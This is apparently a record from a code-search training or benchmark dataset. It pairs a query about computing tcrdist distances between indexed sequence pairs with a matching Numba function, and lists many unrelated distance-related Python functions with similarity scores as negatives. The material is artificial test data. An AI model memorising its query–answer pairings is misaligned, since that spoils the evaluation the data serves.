1], \\\n pred_list_rad[ind_pairs[:, 1], 0], pred_list_rad[ind_pairs[:, 1], 1]\n cost_mat[ind_pairs[:, 0], ind_pairs[:, 1]] = distance_between_spherical_coordinates_rad(az1, ele1, az2, ele2)\n\n row_ind, col_ind = linear_sum_assignment(cost_mat)\n cost = cost_mat[row_ind, col_ind].sum()\n return cost", "def distance(self, c1, c2):\n if c1 > c2:\n c1, c2 = c2, c1\n clusterDistance = self.clusterDistanceCache.get((c1,c2), None)\n if clusterDistance is None:\n # Find the maximum distance between any two pairs in the clusters.\n #\n maxDistance = ConstantValueFeatureComparisonResult(0.0)\n for b1 in self.c2b[c1]:\n for b2 in self.c2b[c2]:\n baseDistance = self._baseDistance(b1, b2)\n if baseDistance > maxDistance:\n maxDistance = baseDistance\n clusterDistance = maxDistance\n self.clusterDistanceCache[(c1,c2)] = clusterDistance\n return clusterDistance", "def calculate_d4ct(self, pairs_dct=None):\n #a, b, c, d, e, f, g, h, i\n if pairs_dct is None:\n pairs_dct={\n 'D': 'A',\n 'G': 'A',\n 'E': 'B',\n 'H': 'B',\n 'F': 'C',\n 'I': 'C',\n }\n data = deepcopy(self.d3ct)\n results_dct = {}\n for cell_line, normalizer in list(pairs_dct.items()):\n cell_data = data.query('cell_line ==\"{}\"'.format(cell_line))\n norm_data = data.query('cell_line ==\"{}\"'.format(normalizer))\n cell_data.index = cell_data.index.droplevel('cell_line')\n norm_data.index = norm_data.index.droplevel('cell_line')\n results_dct[r\"$\\frac{{{}}}{{{}}}$\".format(cell_line, normalizer)] = cell_data / norm_data\n df = pandas.concat(results_dct)\n return df", "def levenshtein_distance(s, t, alphabet=string.printable, **weight_dict):\n if len(s) == 0 or len(t) == 0:\n return max([len(s), len(t)])\n\n rows = len(s) + 1\n cols = len(t) + 1\n\n w = dict((x, (1, 1, 1)) for x in alphabet + alphabet.upper())\n if weight_dict:\n w.update(weight_dict)\n\n dist = [[0 for _ in range(cols)] for _ in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for row in range(1, rows):\n dist[row][0] = dist[row - 1][0] + w[s[row - 1]][0]\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for col in range(1, cols):\n dist[0][col] = dist[0][col - 1] + w[t[col - 1]][1]\n\n for col in range(1, cols):\n for row in range(1, rows):\n deletes = w[s[row - 1]][0]\n inserts = w[t[col - 1]][1]\n subs = max((w[s[row - 1]][2], w[t[col - 1]][2]))\n if s[row - 1] == t[col - 1]:\n subs = 0\n else:\n subs = subs\n dist[row][col] = min(\n dist[row - 1][col] + deletes,\n dist[row][col - 1] + inserts,\n dist[row - 1][col - 1] + subs,\n ) # substitution\n\n return dist[row][col]", "def tsd_alpha(s_1, s_2, p_1, p_2, w_1, w_2, alpha_concurrency):\n\n def calculate_cost(s1_idx, s2_idx):\n t_1 = p_1[s1_idx] + w_1[s1_idx]\n if t_1 > 0:\n b_1 = (p_1[s1_idx]/t_1)\n cost = ((b_1*np.abs(p_2[s2_idx]-p_1[s1_idx])) +\n ((1 - b_1)*np.abs(w_2[s2_idx]-w_1[s1_idx])))\n else:\n cost = 0\n return cost\n\n dist = {}\n lenstr1 = len(s_1)\n lenstr2 = len(s_2)\n for i in range(-1, lenstr1+1):\n dist[(i, -1)] = i+1\n for j in range(-1, lenstr2+1):\n dist[(-1, j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s_1[i] == s_2[j]:\n cost = calculate_cost(i, j)\n else:\n cost = 1\n dist[(i, j)] = min(\n dist[(i-1, j)] + 1, # deletion\n dist[(i, j-1)] + 1, # insertion\n dist[(i-1, j-1)] + cost # substitution\n )\n if i and j and s_1[i] == s_2[j-1] and s_1[i-1] == s_2[j]:\n if alpha_concurrency[(s_1[i], s_2[j])] == Rel.PARALLEL:\n cost = calculate_cost(i, j-1)\n dist[(i, j)] = min(dist[(i, j)], dist[i-2, j-2] + cost) # transposition\n return dist[lenstr1-1, lenstr2-1]", "def DTWDistance(s1, s2):\n len_s1 = len(s1)\n len_s2 = len(s2)\n\n _dtw_mat = np.empty([len_s1, len_s2])\n _dtw_mat[0, 0] = abs(s1[0] - s2[0])\n\n # two special cases : filling first row and columns\n\n for j in range(1, len_s2):\n dist = abs(s1[0] - s2[j])\n _dtw_mat[0, j] = dist + _dtw_mat[0, j - 1]\n\n for i in range(1, len_s1):\n dist = abs(s1[i] - s2[0])\n _dtw_mat[i, 0] = dist + _dtw_mat[i - 1, 0]\n\n #  filling the matrix\n for i in range(1, len_s1):\n for j in range(1, len_s2):\n dist = abs(s1[i] - s2[j])\n _dtw_mat[(i, j)] = dist + min(\n _dtw_mat[i - 1, j], _dtw_mat[i, j - 1], _dtw_mat[i - 1, j - 1]\n )\n\n return _dtw_mat[len_s1 - 1, len_s2 - 1]", "def dist_optimizer(config, optimizer):\n build_strategy, exec_strategy = create_strategy(config)\n\n dist_strategy = DistributedStrategy()\n dist_strategy.execution_strategy = exec_strategy\n dist_strategy.build_strategy = build_strategy\n\n dist_strategy.nccl_comm_num = 1\n dist_strategy.fuse_all_reduce_ops = True\n dist_strategy.fuse_grad_size_in_MB = 16\n optimizer = fleet.distributed_optimizer(optimizer, strategy=dist_strategy)\n\n return optimizer", "def compute_pws_sparse(df, metrics, weights, kargs, radius=50, df2=None, cpu=1, chunk_size=500, store=False, pm_pbar=True):\n metric_keys = [k for k in metrics.keys() if not 'cdr3' in k]\n weight_keys = [k for k in weights.keys() if not 'cdr3' in k]\n assert metric_keys == weight_keys, \"metrics and weights keys must be identical\"\n \n if kargs is not None:\n kargs_keys = [k for k in kargs.keys() if not 'cdr3' in k]\n assert metric_keys == kargs_keys, \"metrics and kargs keys must be identical\"\n \n n1 = df.shape[0]\n \n \"\"\"Compute all but CDR3 as normal, but do not reexpand.\n Computing unique distances should not be memory or CPU intensive\"\"\"\n tcrdist = None\n components = dict()\n for k in metric_keys:\n if df2 is None:\n seqs2 = None\n else:\n seqs2 = df2[k].values\n\n \"\"\"With reexapnd = False, returns: pw_mat, uind_i1, uind_i2\"\"\"\n pwmat, ind1, ind2 = pw.apply_pairwise_rect(metric=metrics[k], \n seqs1=df[k].values, \n seqs2=seqs2, \n ncpus=min(cpu, 2),\n uniqify=True, \n reexpand=False,\n **kargs[k])\n\n components[k] = (pwmat * weights[k], ind1, ind2) \n\n \"\"\"Can't do this because it will be huge. Also can't compute list of\n potential D < radius because that also could be too large.\n But need to pre-compute these non-CDR3 because otherwise the CDR3\n matrix won't be sparse enough with the radius.\n\n Solution: chunk the computation here. Only compute subsets of potential\n seqs pairs sparsely and spread across processors.\"\"\"\n\n if cpu > 1 and n1 > chunk_size:\n \"\"\"Chunk along df (rows) only\"\"\"\n chunk_func = lambda l, n: [np.array(l[i:i + n], dtype=np.int64) for i in range(0, len(l), n)]\n # chunksz = max(len(pw_indices) // cpu, 1)\n \"\"\"Chunked indices is a list of arrays of indices\"\"\"\n \"\"\"List of the chunked [chunk_size,] arrays\"\"\"\n chunked_indices = chunk_func(np.arange(n1, dtype=np.int64), chunk_size)\n \n with multiprocessing.Pool(cpu) as pool:\n dists = parmap.map(memory._sparse_cdr3_tcrdist_shard,\n chunked_indices,\n components,\n df,\n metrics,\n weights,\n kargs,\n radius,\n df2,\n pm_parallel=True,\n pm_pool=pool,\n pm_pbar=pm_pbar)\n\n full_S = sparse.vstack(dists)\n else:\n full_S = memory._sparse_cdr3_tcrdist_shard(np.arange(n1, dtype=np.int64),\n components,\n df,\n metrics,\n weights,\n kargs,\n radius,\n df2) \n \n return {'tcrdist': full_S}", "def distance(transect, method, res, path):\n # record starting time\n start_time = time.time()\n\n headerfile= open(path + 'buffer/dem'+str(res)+'m_header.csv', 'rt')\n header = list(csv.reader(headerfile, delimiter=','))[0]\n\n cellsize=(float(header[2]),-float(header[2]))\n top_left_cor=(float(header[0]),float(header[1]))\n rows=int(header[3])\n cols=int(header[4])\n \n with open(path + 'buffer/'+str(res)+'m/tble_buff_'+str(transect)+'.csv', 'rt') as rasterfile:\n dem=list(csv.reader(rasterfile, delimiter=','))\n dem=np.array(dem[1:len(dem)]).astype(float)\n\n start_point, end_point = get_start_end_points(path, transect)\n \n if method == \"p2p\": # pixel to pixel distance\n pnts, elev = p2p_xyz(start_point, end_point, top_left_cor, cellsize, dem)\n else: # must be one of clos, wavg, bilin, biqua, biqub, tin, or nn\n pnts = make_pnts(start_point, end_point, path, cellsize)\n n_pts = pnts.shape[0]\n elev = np.zeros(n_pts)\n\n if method in [\"clos\", \"wavg\", 'biLin', 'biQua', 'biQub']:\n for i in range(n_pts):\n # compute elevation of each sample point\n (x, y) = pnts[i]\n nb_x, nb_y, nb_z = get_nb_vals(i, pnts, dem, top_left_cor, cellsize, rows, cols)\n if method == \"clos\":\n elev[i] = nb_z[2, 2]\n elif method == \"wavg\":\n elev[i] = neighborhood.WeightedAverage(x, y, nb_x, nb_y, nb_z)\n elif method == \"biLin\":\n elev[i] = neighborhood.BiLinear(x, y, nb_x, nb_y, nb_z)\n elif method == \"biQua\":\n elev[i] = neighborhood.BiQuadratic(x, y, nb_x, nb_y, nb_z) \n elif method == \"biQub\":\n elev[i] = neighborhood.BiQubic(x, y, nb_x, nb_y, nb_z)\n else:\n raise ValueError(\"Unknown method! Must be clos, wavg, biLin, biQua, or biQub\")\n else: # must be TIN OR NN\n tn_fname = 'vertices_tin' + str(int(cellsize[0])) + '.csv'\n tn_path=path + tn_fname\n tn_path=tn_path.replace('/simulation','')\n vertices = np.genfromtxt(tn_path, delimiter = ',')\n #Calculate distance between each pair of TIN points (memory consuming)\n #dists = cdist(pnts, vertices[:,0:2], 'euclidean')\n \n #Create a Delaunay triangulation using sample points and TIN vertices.\n tri = sp.Delaunay(vertices[:,0:2])\n #Create Delaunay Triangulation using the sample point and all vertices\n simplex_indices=tri.find_simplex(pnts)\n for i in range(n_pts):\n (x, y) = pnts[i]\n nbr_ver_indx = tri.simplices[simplex_indices[i]] \n nbr_ver = vertices[nbr_ver_indx]\n #con_ver = get_con_ver(vertices, dists[i], nbr_ver)\n #make an 2D array of the sample sample points because cdist only accepts two arrays\n pnts2=np.array([pnts[i], pnts[i]])\n #Get the distance between the sample point and all other points.\n dists = cdist(pnts2, vertices[:,0:2], 'euclidean')\n #Get nearest vertices around the sample points\n con_ver = get_con_ver(vertices, dists[0], nbr_ver) \n if method == \"TIN\":\n elev[i] = TIN_z(x, y, con_ver, nbr_ver)\n if method == \"NN\":\n elev[i] = NN_z(x, y, con_ver, nbr_ver, cellsize)\n\n dist = 0\n for i in range(len(pnts) - 1):\n d_incr = np.sqrt((pnts[i + 1][0] - pnts[i][0]) ** 2 + \n (pnts[i + 1][1] - pnts[i][1]) ** 2 + \n (elev[i + 1] - elev[i]) ** 2)\n dist = dist + d_incr\n \n # calculate time elapse\n elapsed_time = time.time() - start_time\n print('time elapsed: '+ str(elapsed_time))\n return dist, elapsed_time", "def c_align_small(self, tik_instance):\n n_d, d_d, h_d, w_d, c_d = self.dst_shape\n hw_d = h_d * w_d\n hwnoni = hw_d * self.n_o * self.n_i\n dhw_d = d_d * h_d * w_d\n\n ub_ori = tik_instance.Tensor(self.dtype,\n (self.ub_ele,),\n name=\"ub_ori\",\n scope=tik.scope_ubuf)\n ub_trans = tik_instance.Tensor(self.dtype,\n (self.ub_ele,),\n name=\"ub_trans\",\n scope=tik.scope_ubuf)\n\n burst_len = d_d * self.c_1 * hwnoni * self.c_0 // self.cp_align_len\n tik_instance.data_move(ub_ori,\n self.src_gm,\n 0, 1, burst_len, 0, 0)\n\n with tik_instance.for_range(0, d_d) as num_d:\n with tik_instance.for_range(0, self.c_1) as num_c1:\n ori_cur = num_d * self.c_1 * hwnoni * self.c_0\\\n + num_c1 * hwnoni * self.c_0\n trans_cur = num_d * self.c_1 * hwnoni * self.c_0\\\n + num_c1 * self.c_0\n nburst = hwnoni\n burst_len = self.c_0 // self.cp_align_len\n src_stride = 0\n dst_stride = (self.c_1 - 1) * self.c_0 // self.cp_align_len\n tik_instance.data_move(\n ub_trans[trans_cur],\n ub_ori[ori_cur],\n 0, nburst, burst_len, src_stride, dst_stride)\n\n with tik_instance.for_range(0, dhw_d) as num_dhw:\n src_cur = num_dhw * self.n_o * self.n_i * c_d\n dst_cur = num_dhw * c_d\n nburst = n_d\n burst_len = c_d // self.cp_align_len\n src_stride = 0\n dst_stride = (dhw_d - 1) * c_d // self.cp_align_len\n tik_instance.data_move(\n ub_ori[dst_cur],\n ub_trans[src_cur],\n 0, nburst, burst_len, src_stride, dst_stride)\n\n burst_len = n_d * dhw_d * c_d // self.cp_align_len\n tik_instance.data_move(self.dst_gm,\n ub_ori,\n 0, 1, burst_len, 0, 0)\n\n return tik_instance", "def string_edit_dist(str1, str2):\n sm = edit_distance.SequenceMatcher(a=str1, b=str2)\n return sm.distance()", "def test_CKA_distances(self):\n\t\tm1 = models.vgg11(weights='VGG11_Weights.IMAGENET1K_V1')\n\t\tm2 = models.vgg11(weights='VGG11_Weights.IMAGENET1K_V1')\n\t\tavg_dW, avg_db, distances = self.watcher.distances(m1, m2, method=CKA, pool=True)\n\t\t\n\t\tprint(\"====== pool=True ========\")\n\t\tprint(distances)\n\t\t\n\t\tactual_mean_distance = avg_dW\n\t\texpected_mean_distance = 1.0\n\t\tself.assertAlmostEqual(actual_mean_distance,expected_mean_distance, places=1)\n\t\t\n\t\tactual_mean_distance = avg_db\n\t\texpected_mean_distance = 0.0\n\t\tself.assertAlmostEqual(actual_mean_distance,expected_mean_distance, places=1)\n\n\n\t\tavg_dW, avg_db, distances = self.watcher.distances(m1, m2, method=CKA, pool=False)\n\t\t\t\t\n\t\tprint(\"====== pool=False ========\")\n\t\tprint(distances)\n\t\t\n\t\tactual_mean_distance = avg_dW\n\t\texpected_mean_distance = 1.0\n\t\tself.assertAlmostEqual(actual_mean_distance,expected_mean_distance, places=1)\n\t\t\n\t\tactual_mean_distance = avg_db\n\t\texpected_mean_distance = 0.0\n\t\tself.assertAlmostEqual(actual_mean_distance,expected_mean_distance, places=1)", "def _get_distance(reindeer, race_time):\n interval = reindeer.flight_time + reindeer.rest_time\n cycles = race_time // interval\n flight_time = min(reindeer.flight_time, race_time - interval * cycles)\n total_flying_time = reindeer.flight_time * cycles + flight_time\n return total_flying_time * reindeer.flight_speed", "def test_equals_distance_clusters_rust():\n rust_result = rust_force.calculate_distance_between_two_clusters(\n rust_buildings[:n_first_cluster], rust_buildings[n_first_cluster:], rust_first_cluster_position,\n rust_second_cluster_position)\n rust_result_parallel = rust_force.calculate_distance_between_two_clusters_parallel(\n rust_buildings[:n_first_cluster], rust_buildings[n_first_cluster:], rust_first_cluster_position,\n rust_second_cluster_position)\n assert rust_result == rust_result_parallel", "def test_distance_adc(self):\n railroad = trains.Railroad()\n self.assertEqual(railroad.distance('ADC'), '13')", "def mel_cep_dtw_dist(target, converted):\n total_cost = 0\n total_frames = 0\n\n for (tar, conv) in zip(target, converted):\n tar, conv = tar.astype('float64'), conv.astype('float64')\n cost, _ = dtw.dtw(tar, conv, mt.logSpecDbDist)\n frames = len(tar)\n total_cost += cost\n total_frames += frames\n\n return total_cost / total_frames", "def compute_static_td_broadening(self):\n self.check_temperatures()\n self.distribute_workload()\n self.temperature_dependent_broadening = (\n self.sum_qpt_function('get_tdb_static'))\n self.broadening_is_dynamical = False", "def dtwDistSymbolic(X, Y, m, n):\n dtw = np.zeros((m + 1, n + 1), dtype='int64')\n C = []\n for i in range(m + 1):\n for j in range(n + 1):\n dtw[i, j] = 99999\n dtw[0, 0] = 0\n\n for i in range(1, m+1):\n for j in range(1, n + 1):\n cost = 0 if X[i - 1] == Y[j - 1] else 1\n last_min = np.min([dtw[i, j-1], dtw[i - 1, j], dtw[i-1, j-1]])\n dtw[i, j] = cost + last_min\n # print(dtw)\n return dtw[m, n]", "def __compute_delay(\n arrival_time : Time, \n next_departure_time : Time, \n ttype : str, \n previous_route_id : str,\n next_route_id : str\n ) -> Time:\n # Allowed delay is simply the difference between next departure and current arrival time\n time_to_make_connection = next_departure_time - arrival_time\n if (previous_route_id != next_route_id): # if we are changing route add additional delay\n time_to_make_connection -= EXTRA_TRANSFER_TIME[ttype] # decrease of allowed connection time\n return time_to_make_connection", "def kc_distance(self, other, lambda_=0.0):\n return self._ll_tree.get_kc_distance(other._ll_tree, lambda_)" ]
[ "0.53767455", "0.4826406", "0.47805288", "0.4753317", "0.47484082", "0.46879807", "0.46756828", "0.46334925", "0.45374662", "0.4479596", "0.44660226", "0.44558287", "0.44372138", "0.44101122", "0.43605304", "0.4340066", "0.43351212", "0.4289836", "0.4284168", "0.42829153", "0.42755893", "0.42594606", "0.4254602", "0.42381892", "0.42364877", "0.42356375", "0.42312276", "0.42300743", "0.4198575", "0.4198551", "0.41874513", "0.41816157", "0.41596088", "0.41530952", "0.41521648", "0.41519806", "0.41444176", "0.41434577", "0.41415846", "0.41334322", "0.41262442", "0.41187", "0.4117028", "0.41165566", "0.41154718", "0.41141212", "0.4108284", "0.41047776", "0.41044515", "0.40983894", "0.4096646", "0.40961778", "0.40941164", "0.40869623", "0.40842724", "0.40764564", "0.40752554", "0.40685397", "0.40619808", "0.405885", "0.40544742", "0.40543956", "0.40502715", "0.4047791", "0.4035408", "0.40329498", "0.4029375", "0.40212402", "0.40207168", "0.40196228", "0.40192375", "0.40161568", "0.40153158", "0.39972672", "0.3997251", "0.39919418", "0.3990416", "0.39850807", "0.39802217", "0.3979795", "0.39796016", "0.39763844", "0.39695138", "0.3969389", "0.39654198", "0.39643586", "0.39563015", "0.39553842", "0.39547735", "0.3953716", "0.3952646", "0.39513072", "0.39449778", "0.3942024", "0.39407647", "0.39376652", "0.39355844", "0.39320576", "0.393177", "0.39312434" ]
0.6212199
0
Computes the tcrdist distance for sequences in seqs_mat indicated by pairs of indices.
def nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True): return _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix, dist_weight, gap_penalty, ntrim, ctrim, fixed_gappos)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\"\"\"\n for i in range(ntrim, q_L - ctrim):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] * dist_weight\n continue\n\n short_len = min(q_L, s_L)\n len_diff = abs(q_L - s_L)\n if fixed_gappos:\n min_gappos = min(6, 3 + (short_len - 5) // 2)\n max_gappos = min_gappos\n else:\n min_gappos = 5\n max_gappos = short_len - 1 - 4\n while min_gappos > max_gappos:\n min_gappos -= 1\n max_gappos += 1\n min_dist = -1\n # min_count = -1\n for gappos in range(min_gappos, max_gappos + 1):\n tmp_dist = 0\n # tmp_count = 0\n remainder = short_len - gappos\n for n_i in range(ntrim, gappos):\n \"\"\"n_i refers to position relative to N term\"\"\"\n # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]])\n tmp_dist += distance_matrix[seqs_mat[query_i, n_i], seqs_mat[seq_i, n_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i])\n for c_i in range(ctrim, remainder):\n \"\"\"c_i refers to position relative to C term, counting upwards from C term\"\"\"\n tmp_dist += distance_matrix[seqs_mat[query_i, q_L - 1 - c_i], seqs_mat[seq_i, s_L - 1 - c_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i])\n if tmp_dist < min_dist or min_dist == -1:\n min_dist = tmp_dist\n # min_count = tmp_count\n if min_dist == 0:\n break\n dist[ind_i] = min_dist * dist_weight + len_diff * gap_penalty\n return dist", "def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n \n \"\"\"As long as ldmat is big enough to accomodate the largest sequence\n its OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped\"\"\"\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n \n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n \n \"\"\"Do not need to re-zero each time\"\"\"\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist", "def get_all_distances(cls, indices, dist_mat):\n distances = []\n for i, j in combinations(indices, 2):\n distances.append(cls.get_dist(dist_mat, i, j))\n return distances", "def traj_loc_distance(trajs, locs):\n return distance_matrix(\n np.asarray([t.last_pos() for t in trajs]),\n locs[:,2:4]\n )", "def reduce_mtx(distmat, indices):\r\n return distmat.take(indices, 0).take(indices, 1)", "def nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n #print(indices.shape)\n #print(seqs_mat.shape)\n #print(seqs_L.shape)\n return _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix, gap_penalty)", "def simtraj(trans_mat, tsteps, stt=0):\n seq = zeros(tsteps)\n curr = stt\n \n nstates = trans_mat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n for tt in range(tsteps):\n seq[tt] = curr\n weights = copy(trans_mat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n return seq", "def gen_dist(genes):\n\n # First generate an NxNxB matrix that has False where\n # i and j individuals have the same kth gene and True\n # otherwise (XOR operation). Then sum along\n # the genome axis to get distance\n return np.sum(genes[:,None,:] ^ genes, axis=-1)", "def compute_pairwise_distances(input_vecs: types.Tensor) -> types.Tensor:\n r = tf.reduce_sum(input_vecs * input_vecs, axis=1, keepdims=True)\n pdistance_matrix = (\n r\n - 2 * tf.matmul(input_vecs, input_vecs, transpose_b=True)\n + tf.transpose(r)\n )\n return tf.cast(pdistance_matrix, dtype=tf.float32)", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def ComputeDistMatrix(dict_alignedSequences):\r\n \r\n # check if dictionary with keys as tuples containing integers and values as tuples containing strings\r\n check = True \r\n #1 Check Input is dict\r\n if isinstance(dict_alignedSequences, dict) == False:\r\n check = False\r\n \r\n #2 Check are the keys and values tuples. Do the keys only contain integers and the vlaues only strings\r\n i = 0\r\n while len(dict_alignedSequences) > i:\r\n #checking for keys and values as tuples\r\n if isinstance(list(dict_alignedSequences.keys())[i], tuple) == False or isinstance(list(dict_alignedSequences.values())[i], tuple) == False:\r\n check = False\r\n break\r\n #checking keys for integers\r\n if isinstance(list(dict_alignedSequences.keys())[i][0], int) == False or isinstance(list(dict_alignedSequences.keys())[i][1], int) == False:\r\n check = False\r\n break\r\n #checking values for strings\r\n if isinstance(list(dict_alignedSequences.values())[i][0], str) == False or isinstance(list(dict_alignedSequences.values())[i][1], str) == False:\r\n check = False\r\n break\r\n \r\n #increment the counter for while loop\r\n i += 1\r\n \r\n #3 Check sequences contain aligned DNA and are of equal length\r\n for key in dict_alignedSequences:\r\n if is_aligned_dna(dict_alignedSequences[key][0]) == False or is_aligned_dna(dict_alignedSequences[key][1]) == False:\r\n check = False\r\n break\r\n if len(dict_alignedSequences[key][0]) != len(dict_alignedSequences[key][1]):\r\n check = False\r\n break\r\n \r\n #final evalauation if data is usable\r\n if check == False:\r\n raise TypeError ('malformed input')\r\n \r\n #get number of sequences\r\n matrixdim = howmany_sequences(dict_alignedSequences)\r\n #initialize dist matrix\r\n distMatrix = init_Dist_Matrix(matrixdim)\r\n \r\n \r\n for i in dict_alignedSequences.keys():\r\n # useing the key i to get the corisponding aligned sequences \r\n seq = dict_alignedSequences[i]\r\n #calculate distances between the sequences\r\n distance = calculate_distance(seq[0],seq[1])\r\n #markdown result at the corrsiponding place in the distmatrix\r\n distMatrix[i[0]][i[1]] = distance\r\n distMatrix[i[1]][i[0]] = distance\r\n \r\n return(distMatrix)", "def cal_distances(embeddings):\n # calculate\n dist = np.zeros([len(embeddings), len(embeddings)], dtype=float)\n for ii in xrange(len(embeddings)):\n for jj in xrange(ii + 1, len(embeddings)):\n dist[ii, jj] = np.linalg.norm(embeddings[ii] - embeddings[jj])\n dist[jj, ii] = dist[ii, jj] \n \n # return\n return dist", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def get_distances(self, crds):\n self.all_dist = np.zeros((self.natom, self.natom))\n # Loop over upper triangle of atom pairs\n for iat in range(self.natom-1):\n # Get the atom indices\n at_inds = np.arange(len(crds))\n\n # Calc distances between atoms (only upper triangle though)\n at_msk = at_inds > iat\n all_ut_dist = crds[at_msk] - crds[iat]\n all_ut_dist = np.linalg.norm(all_ut_dist, axis=1)\n\n self.all_dist[iat, iat+1:] = all_ut_dist\n\n # Get lower triangle indices\n self.all_dist = self.all_dist + self.all_dist.T", "def measure_distance(self, mat):\n if len(mat) == 1:\n print(\"chain has only one CAatom\")\n return\n self.dists = []\n for num in range(0, len(mat)):\n if num + 1 <= len(mat) - 1:\n c1 = mat[num]\n c2 = mat[num + 1]\n d = c2 - c1\n self.dists.append(math.sqrt(np.sum(d * d)))\n return self.dists", "def distance_dmc(distances, Ks, points):\n doors = []\n for d in distances:\n dmc = []\n for k in Ks:\n print \"==========================\", k, \"==========================\"\n clusters = create_clusters(25, k)\n\n kmeans(points, clusters)\n # print \"Finished creating kmeans algorithm\"\n\n create_backbone_network(GRAPH, clusters, d)\n # print \"Finished creating backbone network\"\n\n find_all_shortest_paths(clusters, SP_TABLE, GRAPH)\n # print \"Finished finding all shortest paths\"\n\n for clst in clusters:\n clst.inter_cost = inter_cost(clst)\n clst.intra_cost = intra_cost(points, clst)\n clst.dm_cost = door_matt_cost(clusters, clst, SP_TABLE)\n\n ret = total_cost(clusters)\n dmc.append(ret[2])\n doors.append(sum(dmc))\n draw_door_matts(map(lambda d: float(format(d, \".4g\")), distances), doors)", "def compute_distmat(data, distfn):\n out = np.zeros((data.shape[0], data.shape[0]))\n for i in xrange(data.shape[0]):\n for j in xrange(data.shape[0]):\n if i == j: continue\n out[i,j] = distfn(data[i,:,:], data[j,:,:])\n return out", "def calc_distances(self, templates_features=None, batch_size=50000, th=0.2, beta=1.1):\n if templates_features is None:\n templates_features = self.calc_templates()\n distances = np.empty((self.pairs.shape[0]), dtype=np.float32)\n start, end = 0, 0\n for batch in self.batches(self.pairs, batch_size):\n t1 = np.empty((len(batch), self.features_dim), dtype=np.float32)\n t2 = np.empty((len(batch), self.features_dim), dtype=np.float32)\n start = end\n end += len(batch)\n # attenuate = np.empty((len(batch)), dtype=np.bool)\n for i, pair in enumerate(batch):\n t1[i] = templates_features[pair[0]]\n t2[i] = templates_features[pair[1]]\n # lomax1 = np.max(self.quality_scores[pair[0]])\n # lomax2 = np.max(self.quality_scores[pair[1]])\n # attenuate[i] = lomax1 <= th or lomax2 <= th\n\n ## find cosine distance, assume template descriptors are normalized\n distances[start:end] = 1 - np.einsum(\"ij,ij->i\", t1, t2)\n # distances[start:end] = np.where(attenuate, distances[start:end], distances[start:end] / beta)\n return distances", "def calcDistance(self):\n # Initialize the distance matrix\n arr = np.repeat(0, self.num_col)\n result_mat = np.repeat(arr, self.num_col)\n result_mat = np.reshape(result_mat, (self.num_col, self.num_col))\n trinary_mat = self.df_trinary.values\n for left_val in TRINARY_VALUES:\n left_func = lambda v: 1 if v==left_val else 0\n left_mat = np.transpose(np.vectorize(left_func)(trinary_mat))\n for right_val in TRINARY_VALUES:\n if left_val == right_val:\n continue\n right_func = 